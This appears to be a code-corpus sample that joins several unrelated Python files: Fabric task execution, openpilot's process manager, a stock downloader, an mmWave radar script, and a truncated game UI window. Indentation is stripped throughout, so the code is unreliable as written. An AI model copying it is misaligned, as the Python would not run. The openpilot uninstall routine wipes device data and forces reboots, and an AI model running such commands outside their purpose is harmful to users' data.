# traceback, host info etc -- so we don't want to double up
# on that. For everything else, though, we need to make
# clear what host encountered the exception that will
# print.
if type(e) is not SystemExit:
if not (isinstance(e, NetworkError) and _is_network_error_ignored()):
sys.stderr.write("!!! Parallel execution exception under host %r:\n" % name)
queue.put({'name': name, 'result': e})
# Here, anything -- unexpected exceptions, or abort()
# driven SystemExits -- will bubble up and terminate the
# child process.
if not (isinstance(e, NetworkError) and _is_network_error_ignored()):
raise
def _execute(task, host, my_env, args, kwargs, jobs, queue, multiprocessing):
"""
Primary single-host work body of execute()
"""
# Log to stdout
if state.output.running and not hasattr(task, 'return_value'):
print("[%s] Executing task '%s'" % (host, my_env['command']))
# Create per-run env with connection settings
local_env = to_dict(host)
local_env.update(my_env)
# Set a few more env flags for parallelism
if queue is not None:
local_env.update({'parallel': True, 'linewise': True})
# Handle parallel execution
if queue is not None: # Since queue is only set for parallel
name = local_env['host_string']
# Stuff into Process wrapper
kwarg_dict = {
'task': task,
'args': args,
'kwargs': kwargs,
'queue': queue,
'name': name,
'env': local_env,
}
p = multiprocessing.Process(target=_parallel_wrap, kwargs=kwarg_dict)
# Name/id is host string
p.name = name
# Add to queue
jobs.append(p)
# Handle serial execution
else:
with settings(**local_env):
return task.run(*args, **kwargs)
def _is_task(task):
return isinstance(task, Task)
def execute(task, *args, **kwargs):
"""
Execute ``task`` (callable or name), honoring host/role decorators, etc.
``task`` may be an actual callable object, or it may be a registered task
name, which is used to look up a callable just as if the name had been
given on the command line (including :ref:`namespaced tasks <namespaces>`,
e.g. ``"deploy.migrate"``.
The task will then be executed once per host in its host list, which is
(again) assembled in the same manner as CLI-specified tasks: drawing from
:option:`-H`, :ref:`env.hosts <hosts>`, the `~fabric.decorators.hosts` or
`~fabric.decorators.roles` decorators, and so forth.
``host``, ``hosts``, ``role``, ``roles`` and ``exclude_hosts`` kwargs will
be stripped out of the final call, and used to set the task's host list, as
if they had been specified on the command line like e.g. ``fab
taskname:host=hostname``.
Any other arguments or keyword arguments will be passed verbatim into
``task`` (the function itself -- not the ``@task`` decorator wrapping your
function!) when it is called, so ``execute(mytask, 'arg1',
kwarg1='value')`` will (once per host) invoke ``mytask('arg1',
kwarg1='value')``.
:returns:
a dictionary mapping host strings to the given task's return value for
that host's execution run. For example, ``execute(foo, hosts=['a',
'b'])`` might return ``{'a': None, 'b': 'bar'}`` if ``foo`` returned
nothing on host `a` but returned ``'bar'`` on host `b`.
In situations where a task execution fails for a given host but overall
progress does not abort (such as when :ref:`env.skip_bad_hosts
<skip-bad-hosts>` is True) the return value for that host will be the
error object or message.
.. seealso::
:ref:`The execute usage docs <execute>`, for an expanded explanation
and some examples.
.. versionadded:: 1.3
.. versionchanged:: 1.4
Added the return value mapping; previously this function had no defined
return value.
"""
my_env = {'clean_revert': True}
results = {}
# Obtain task
is_callable = callable(task)
if not (is_callable or _is_task(task)):
# Assume string, set env.command to it
my_env['command'] = task
task = crawl(task, state.commands)
if task is None:
msg = "%r is not callable or a valid task name" % (my_env['command'],)
if state.env.get('skip_unknown_tasks', False):
warn(msg)
return
else:
abort(msg)
# Set env.command if we were given a real function or callable task obj
else:
dunder_name = getattr(task, '__name__', None)
my_env['command'] = getattr(task, 'name', dunder_name)
# Normalize to Task instance if we ended up with a regular callable
if not _is_task(task):
task = WrappedCallableTask(task)
# Filter out hosts/roles kwargs
new_kwargs, hosts, roles, exclude_hosts = parse_kwargs(kwargs)
# Set up host list
my_env['all_hosts'], my_env['effective_roles'] = task.get_hosts_and_effective_roles(hosts, roles,
exclude_hosts, state.env)
parallel = requires_parallel(task)
if parallel:
# Import multiprocessing if needed, erroring out usefully
# if it can't.
try:
import multiprocessing
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + """
At least one task needs to be run in parallel, but the
multiprocessing module cannot be imported (see above
traceback.) Please make sure the module is installed
or that the above ImportError is fixed.""")
else:
multiprocessing = None
# Get pool size for this task
pool_size = task.get_pool_size(my_env['all_hosts'], state.env.pool_size)
# Set up job queue in case parallel is needed
queue = multiprocessing.Queue() if parallel else None
jobs = JobQueue(pool_size, queue)
if state.output.debug:
jobs._debug = True
# Call on host list
if my_env['all_hosts']:
# Attempt to cycle on hosts, skipping if needed
for host in my_env['all_hosts']:
try:
results[host] = _execute(
task, host, my_env, args, new_kwargs, jobs, queue,
multiprocessing
)
except NetworkError as e:
results[host] = e
# Backwards compat test re: whether to use an exception or
# abort
if not state.env.use_exceptions_for['network']:
func = warn if state.env.skip_bad_hosts else abort
error(e.message, func=func, exception=e.wrapped)
else:
raise
# If requested, clear out connections here and not just at the end.
if state.env.eagerly_disconnect:
disconnect_all()
# If running in parallel, block until job queue is emptied
if jobs:
err = "One or more hosts failed while executing task '%s'" % (
my_env['command']
)
jobs.close()
# Abort if any children did not exit cleanly (fail-fast).
# This prevents Fabric from continuing on to any other tasks.
# Otherwise, pull in results from the child run.
ran_jobs = jobs.run()
for name, d in six.iteritems(ran_jobs):
if d['exit_code'] != 0:
if isinstance(d['results'], NetworkError) and \
_is_network_error_ignored():
error(d['results'].message, func=warn, exception=d['results'].wrapped)
elif isinstance(d['results'], BaseException):
error(err, exception=d['results'])
else:
error(err)
results[name] = d['results']
# Or just run once for local-only
else:
with settings(**my_env):
results['<local-only>'] = task.run(*args, **new_kwargs)
# Return what we can from the inner task executions
return results
|
manager.py
|
#!/usr/bin/env python3
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from typing import Dict, List
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
from common.op_params import opParams
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1020
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
kill_updated = opParams().get('update_behavior').lower().strip() == 'off' or os.path.exists('/data/no_ota_updates')
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit status
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", "-j8"], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline() # type: ignore
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n') # type: ignore
compile_output += r
if retry:
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed, log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"driverview": "selfdrive.monitoring.driverview",
"lanespeedd": "selfdrive.controls.lib.lane_speed",
}
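# Each entry is either a python module path (run through selfdrive.launcher) or a
# (relative_dir, argv) tuple for a native binary; start_managed_process() below picks
# the launch path based on the entry's type.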
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes: List[str] = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
# 'updated',
'deleter',
]
if not kill_updated:
persistent_processes.append('updated')
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'dmonitoringd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'locationd',
'lanespeedd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
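# Hypothetical use from another module:
#   register_managed_process("mycustomd", "selfdrive.mycustomd", car_started=True)
# which would add the (assumed) selfdrive.mycustomd module to the processes started
# whenever the car is running.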
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
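# The daemon pattern above stores the child's pid in Params (e.g. "AthenadPid") and,
# on the next manager start, only respawns the daemon if that pid is gone or belongs
# to a different command line.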
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
if ANDROID:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
run_all = False
if (msg.thermal.started and "driverview" not in running) or run_all:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# When not prebuilt, the spinner starts from 70 here (the build phase uses the remaining 30%)
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
if ANDROID:
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start. Press Reset to pull and reset to origin!\n \n" + error
with TextWindow(error) as t:
exit_status = t.wait_for_exit()
if exit_status == 'reset':
for _ in range(2):
try:
subprocess.check_output(["git", "pull"], cwd=BASEDIR)
subprocess.check_output(["git", "reset", "--hard", "@{u}"], cwd=BASEDIR)
print('git reset successful!')
break
except subprocess.CalledProcessError as e:
# print(e.output)
if _ != 1:
print('git reset failed, trying again')
time.sleep(5) # wait 5 seconds and try again
time.sleep(1)
subprocess.check_output(["am", "start", "-a", "android.intent.action.REBOOT"])
raise
# manual exit because we are forked
sys.exit(0)
|
download_data.py
|
#!/Users/coha/.pyenv/shims/python
from grs import BestFourPoint
from grs import Stock
from grs import TWSENo
import threading
#from concurrent.futures import ThreadPoolExecutor
stock_no_list = TWSENo().all_stock_no
def WorkerJob(stock_index, days):
print('# index {}'.format(stock_index))
stock = Stock(stock_index, days)
#stock.out_putfile('data/{}.csv'.format(stock_index))
"""
with ThreadPoolExecutor(max_workers=10) as executor:
for i in sorted(stock_no_list):
if len(i) != 4:
continue
#stock = Stock(i, 12 * 30)
#stock = Stock(i, 3 * 1)
#stock.out_putfile('data/{}.csv'.format(i))
print(type(i))
a = executor.submit(WorkerJob, i, 3)
#threading.Thread(target = WorkerJob, args = (i, 3)).start()
print(a.result())
"""
for i in sorted(stock_no_list):
if len(i) != 4:
continue
print('[compute] stock {}'.format(i))
#stock = Stock(i, 12 * 30)
stock = Stock(i, 1)
stock.out_putfile('/Users/coha/git/time-series-predictor/data/{}.csv'.format(i))
|
phase_multi.py
|
import numpy as np
import mmwave.dsp as dsp
from mmwave.dataloader import DCA1000
import os
from FER.utils import parseConfigFile, arange_tx, get_label
from queue import Queue
import threading
from mmwave.dsp.utils import Window
# configure file
configFileName = 'C:/Users/Zber/Desktop/mmWave Configuration/profile_3d_aop_3s.cfg'
# Local re-definition of arange_tx (shadows the version imported from FER.utils above).
def arange_tx(signal, num_tx, vx_axis=2, axis=1):
"""Separate interleaved radar data from separate TX along a certain axis to account for TDM radars.
Args:
signal (ndarray): Received signal.
num_tx (int): Number of transmit antennas.
vx_axis (int): Axis in which to accumulate the separated data.
axis (int): Axis in which the data is interleaved.
Returns:
ndarray: Separated received data, with the per-TX copies stacked along ``vx_axis``.
"""
# Reorder the axes
reordering = np.arange(len(signal.shape))
reordering[0] = axis
reordering[axis] = 0
signal = signal.transpose(reordering)
out = np.concatenate([signal[i::num_tx, ...] for i in range(num_tx)], axis=vx_axis)
return out.transpose(reordering)
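# Illustrative sketch, not used by the pipeline below: the shapes are assumed example values
# chosen to match the 3-TX / 4-RX configuration used later in this script.
def _arange_tx_shape_demo():
    """Show the shape effect of arange_tx: the interleaved chirp axis is de-interleaved and the
    per-TX copies are stacked onto the virtual-antenna (RX) axis, i.e.
    (frames, loops * num_tx, rx, samples) -> (frames, loops, rx * num_tx, samples).
    """
    demo = np.zeros((10, 96, 4, 256), dtype=np.complex64)  # 10 frames, 32 loops * 3 TX, 4 RX, 256 samples
    assert arange_tx(demo, num_tx=3).shape == (10, 32, 12, 256)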
def save_phase_data(bin_path, save_path, start_bin, end_bin, num_frames, chirp_index=5, is_diff=True):
if is_diff:
num_frames -= 1
# load Numpy Data
adc_data = np.fromfile(bin_path, dtype=np.int16)
adc_data = adc_data.reshape(numFrames, -1)
adc_data = np.apply_along_axis(DCA1000.organize, 1, adc_data, num_chirps=numChirpsPerFrame,
num_rx=numRxAntennas, num_samples=numADCSamples)
range_data = dsp.range_processing(adc_data, window_type_1d=Window.BLACKMAN)
range_data = arange_tx(range_data, num_tx=numTxAntennas)
range_data = range_data[:, chirp_index, :, start_bin:end_bin]
range_data = range_data.transpose((1, 2, 0))
# angle and unwrap
sig_phase = np.angle(range_data)
sig_phase = np.unwrap(sig_phase)
# save file
np.save(save_path, sig_phase)
print("{} npy file saved!".format(save_path))
def thread_job(queue, bin_path, out_path):
while not queue.empty():
q = queue.get()
bpath = os.path.join(bin_path, q)
hpath = os.path.join(out_path, q.replace("_Raw_0.bin", ""))
save_phase_data(bpath, hpath, start_bin=bin_start, end_bin=bin_end, num_frames=numFrames,
chirp_index=chirp_index, is_diff=is_diff)
queue.task_done()
if __name__ == '__main__':
root_path = "D:\\Subjects"
data_path = "{}_{}_Raw_0.bin"
output_data_path = "C:\\Users\\Zber\\Desktop\\Subjects_Phase"
# load radar configuration
numTxAntennas = 3
numRxAntennas = 4
configParameters = parseConfigFile(configFileName, numTxAnt=numTxAntennas)
numFrames = configParameters['numFrames']
numADCSamples = configParameters['numAdcSamples']
numLoopsPerFrame = configParameters['numLoops']
numChirpsPerFrame = numTxAntennas * numLoopsPerFrame
numRangeBins = numADCSamples
numDopplerBins = numLoopsPerFrame
# data settings
is_diff = True
save_config = True
bin_start = 5
bin_end = 15
chirp_index = 5
# start index
subs = ['S0', 'S1', 'S2', 'S3', 'S4', 'S5']
# subs = ['S0']
emotion_list = ['Joy', 'Surprise', 'Anger', 'Sadness', 'Fear', 'Disgust', 'Neutral']
queue = Queue()
start_index = 0
end_index = 30
for sub in subs:
for l, e in enumerate(emotion_list):
for i in range(start_index, end_index):
bin_path = os.path.join(root_path, sub, data_path.format(e, i))
relative_path = os.path.join(sub, data_path.format(e, i))
queue.put(relative_path)
if save_config:
import json
config = {
"Different": str(is_diff),
"Bin Start": bin_start,
"Bin End": bin_end,
"Data Start Index": start_index,
"Data End Index": end_index,
}
with open(os.path.join(output_data_path, 'config.json'), 'w') as f:
json.dump(config, f, indent=4)
# q = queue.get()
# bpath = os.path.join(root_path, q)
# hpath = os.path.join(output_data_path, q.replace("_Raw_0.bin", ""))
# save_phase_data(bpath, hpath, start_bin=bin_start, end_bin=bin_end, num_frames=numFrames, chirp_index=chirp_index,
# is_diff=is_diff)
NUM_THREADS = 16
for i in range(NUM_THREADS):
worker = threading.Thread(target=thread_job, args=(queue, root_path, output_data_path))
worker.start()
print('waiting for all tasks to be completed.', queue.qsize(), 'tasks')
print('This can take an hour or two depending on dataset size')
queue.join()
print('all done')
|
play.py
|
# Released under the MIT License. See LICENSE for details.
#
"""Provides the top level play window."""
from __future__ import annotations
from typing import TYPE_CHECKING
import _ba
import ba
if TYPE_CHECKING:
from typing import Optional, Tuple
class PlayWindow(ba.Window):
"""Window for selecting overall play type."""
def __init__(self,
transition: str = 'in_right',
origin_widget: Optional[ba.Widget] = None):
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
import threading
# Preload some modules we use in a background thread so we won't
# have a visual hitch when the user taps them.
threading.Thread(target=self._preload_modules).start()
# We can currently be used either for main menu duty or for selecting
# playlists (should make this more elegant/general).
self._is_main_menu = not ba.app.ui.selecting_private_party_playlist
uiscale = ba.app.ui.uiscale
width = 1000 if uiscale is ba.UIScale.SMALL else 800
x_offs = 100 if uiscale is ba.UIScale.SMALL else 0
height = 550
button_width = 400
scale_origin: Optional[Tuple[float, float]]
if origin_widget is not None:
self._transition_out = 'out_scale'
scale_origin = origin_widget.get_screen_space_center()
transition = 'in_scale'
else:
self._transition_out = 'out_right'
scale_origin = None
self._r = 'playWindow'
super().__init__(root_widget=ba.containerwidget(
size=(width, height),
transition=transition,
toolbar_visibility='menu_full',
scale_origin_stack_offset=scale_origin,
scale=(1.6 if uiscale is ba.UIScale.SMALL else
0.9 if uiscale is ba.UIScale.MEDIUM else 0.8),
stack_offset=(0, 0) if uiscale is ba.UIScale.SMALL else (0, 0)))
self._back_button = back_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(55 + x_offs, height - 132),
size=(120, 60),
scale=1.1,
text_res_scale=1.5,
text_scale=1.2,
autoselect=True,
label=ba.Lstr(resource='backText'),
button_type='back')
txt = ba.textwidget(
parent=self._root_widget,
position=(width * 0.5, height - 101),
# position=(width * 0.5, height -
# (101 if main_menu else 61)),
size=(0, 0),
text=ba.Lstr(resource=(
self._r +
'.titleText') if self._is_main_menu else 'playlistsText'),
scale=1.7,
res_scale=2.0,
maxwidth=400,
color=ba.app.ui.heading_color,
h_align='center',
v_align='center')
ba.buttonwidget(edit=btn,
button_type='backSmall',
size=(60, 60),
label=ba.charstr(ba.SpecialChar.BACK))
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.textwidget(edit=txt, text='')
v = height - (110 if self._is_main_menu else 90)
v -= 100
clr = (0.6, 0.7, 0.6, 1.0)
v -= 280 if self._is_main_menu else 180
v += (30
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL else 0)
hoffs = x_offs + 80 if self._is_main_menu else x_offs - 100
scl = 1.13 if self._is_main_menu else 0.68
self._lineup_tex = ba.gettexture('playerLineup')
angry_computer_transparent_model = ba.getmodel(
'angryComputerTransparent')
self._lineup_1_transparent_model = ba.getmodel(
'playerLineup1Transparent')
self._lineup_2_transparent_model = ba.getmodel(
'playerLineup2Transparent')
self._lineup_3_transparent_model = ba.getmodel(
'playerLineup3Transparent')
self._lineup_4_transparent_model = ba.getmodel(
'playerLineup4Transparent')
self._eyes_model = ba.getmodel('plasticEyesTransparent')
self._coop_button: Optional[ba.Widget] = None
# Only show coop button in main-menu variant.
if self._is_main_menu:
self._coop_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(hoffs, v + (scl * 15 if self._is_main_menu else 0)),
size=(scl * button_width,
scl * (300 if self._is_main_menu else 360)),
extra_touch_border_scale=0.1,
autoselect=True,
label='',
button_type='square',
text_scale=1.13,
on_activate_call=self._coop)
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
ba.widget(edit=btn,
